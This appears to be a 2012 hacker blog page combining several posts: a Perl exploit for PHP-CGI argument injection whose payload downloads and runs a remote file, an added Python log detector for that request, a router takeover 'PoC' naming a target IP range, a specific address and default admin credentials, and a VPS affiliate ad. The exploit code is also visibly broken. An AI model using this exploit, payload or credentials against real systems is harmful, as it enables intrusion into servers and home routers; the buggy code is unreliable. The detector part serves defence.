
[Exploit Updated]: PHP CGI – executes a payload which is php shellexec(); , My 3rd PERL expl…

Posted on 6th May 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

Done this, but this is only a basic version which, I guess, does things in a nice way :)

It is my 3rd Perl exploit, so pls don't bash me. Any fixes etc. would be appreciated, BUT remember it is using the RIGHT method, i.e. injecting PHP by shellexec(), which IS a PHP CGI function, and the ONLY way it will definitely exec!

ALSO this CAN execute cmds ofc, I will add in a line if you wish to do this.. ok…

Ok now on with the show….

 


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG,rotor/aussies,even iCER ya prick :P 

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage: $0 <host>\n";
print "OPTIONAL CMD USE BUT DISABLED : [Ex: id]>\n";
exit(-1);
}

##my $cmd_exec_payload = "<php? system($_GET[\'$cmd\']); ?>";  ## Optional
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";  ## Config here

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

##$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $cmd_exec_payload ." HTTP/1.1\r\n";
##print $sock "Host: $host\n";
##print $sock "Accept: */*\n";
##print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command exec payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

Enjoy / xd–
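
Seen from the defender's side, the request line built in the script above leaves a recognisable shape in web server access logs: a query string with no unencoded "=", whose "+"-separated pieces URL-decode to "-d" switches overriding allow_url_include and auto_prepend_file. The detector below is an added example, not part of the original post; the log lines, client addresses and the PLACEHOLDER value are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# "METHOD target HTTP/x.y" inside a combined-format access log entry
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# php.ini keys that the request shown on this page overrides with -d
RISKY_INI = ("allow_url_include", "auto_prepend_file")
# Constructed sample log lines (documentation addresses, placeholder payload)
SAMPLE_LOG = [
    '203.0.113.7 - - [06/May/2012:10:00:00 +0000] "POST //cgi-bin/?-d%20allow_url_include'
    '%3DOn+-d%20auto_prepend_file%3DPLACEHOLDER HTTP/1.1" 200 512',
    '198.51.100.4 - - [06/May/2012:10:00:05 +0000] "GET /list.php?sort=-date HTTP/1.1" 200 1024',
    '198.51.100.9 - - [06/May/2012:10:00:09 +0000] "GET /search?php+cgi HTTP/1.1" 200 300',
]


def cgi_argv(raw_query):
    """Return the argv a CGI binary derives from a query string, or []."""
    # A query with no unencoded '=' is an "indexed" query: it is split on '+'
    # and each URL-decoded piece becomes an argument. %3D does not count as '='.
    if not raw_query or "=" in raw_query:
        return []
    return [unquote(part) for part in raw_query.split("+") if part]


def inspect_line(line):
    """Return a finding dict for a request that passes switches, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    argv = cgi_argv(m.group("target").partition("?")[2])
    switches = [a for a in argv if a.startswith("-")]
    if not switches:
        return None
    joined = " ".join(argv).lower()
    return {
        "client": line.split(" ", 1)[0],
        "switches": switches,
        "ini_overrides": [k for k in RISKY_INI if k in joined],
    }


def scan(lines):
    """Return findings for every suspicious line, in input order."""
    return [f for f in map(inspect_line, lines) if f]


if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Only the first sample line is reported; the ordinary key=value query and the harmless indexed search are ignored.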

PoC : WindWeb/2.0 Server admin add exploit , carnage for ANY .kr/.tw ! Kept pvt for 5yrs… being leaked well, we owned them now, you can try reown them :P~

Posted on 1st May 2012 in Android, Codes, Exploits, Papers, Uncategorized

I'll make it short and sweet, but I can tell you NOW, this is usable across MANY routers, and yes, it DOES matter on some routers if they enable or disable ports 80/443, in which Netgear, and obviously this brand, doesn't :P

Here we go… to add an admin or just overwrite one: Info details for exploit / jmp point and server error for gdb … have fun!


like, you will need to find your OWN index.html, as this MUST be simply changed, so, when you find, an example would be to scan 220.76.* range.. then, learn some about routers, find a WindWeb, then it should be in
their admin page BUT this is accessed remotely... and, locally then after you change the pass ... I doubt many opers even change router passes once set....so you make abs no logs really... nothing shows to them unless it is some hi duty server :s
so yes, it can be very VERY nice... but I'm not going to hand out a *how to* on finding them... simple. find em yaself!
220.76.166.73:80 / was this box btw... so, as you see, 220 , is obv an adsl range and yea, what stupid ass server, runs a router ad ion port 80 ? THIS ONE! bahha

Did we contact them, umm no, did they pay us to do any work for them...so no.

///////////////////PoC By xd and dd0k/anemic
Server: WindWeb/2.0  Connection: close  Content-Type: text/html
Web Server Error Report:
Server Error: 501 Not Implemented
Operating System Error Nr:3997697:
errno = 0x3d0001

///Notes: .korean HOME routers/BIZ routers ALL affected - noted: 4mb and fast on the adsl alone.. not bad for HOME! 4meg/s!

<content="text/html; charset=euc-kr">
<SCRIPT LANGUAGE="JavaScript">
var st_lan_ip = new Array(4)
var st_lan_subnet = new Array(4)
var st_lan_mac = new Array(4)
st_lan_ip[0] = "192.168.1.1"
st_lan_subnet[0] = "255.255.255.0"
st_lan_mac[0] = "00:05:C6:3A:1A:45"
var st_lan_active = "1"
<!--
var id = new Array();
id[0]="adsl"
id[1]="user"

var pass = new Array();
pass[0]="megapass"
pass[1]="megapass"

// will make login on the localhost/ user:adsl pass:megapass

VPS Hosting at 9.95 a/mo, VERY nice setups! Use AFF Link to get better deals/support!

Posted on 26th November 2011 in Android, Codes, Exploits, Papers, Uncategorized

SIGNUP HERE -> http://www.vr.org/aff.php?aff=551

Just to point out an awesome VPS hosting place, I currently have 2 boxes at, and who have the BEST customer support I have ever found!
The company is HostVirtual, an 11 location company, with datacenters opening now in Asia, which is super-fast fiber lines.
Folks, this company is going places.. Also hosting warchall.net, and MANY other sites/shells!
They cater for all, have awesome service, and it is CLOUDS, you get what you pay for, they cannot cheat because xen-cloud limits usage accordingly…where openvz does not. This is why, when you're looking at your next Openvz box, check how much ram and burstable-ram you get..then check even… you will be shocked :>
This company's boxes are all Xeon QuadCore Highend side of town stuff, awesome highspeed blades, all with extra fine DDoS protection!

Please use the AFFILIATE link http://www.vr.org/aff.php?aff=551 , and then you can use the hand of god to summon xd– on Efnet for support, or simply submit a ticket!

These boxes are worth it.. initial signup is only 4.31!
Existing customers get 10% off each ‘instance’, which is about 8bux for making another VPS… very handy :)
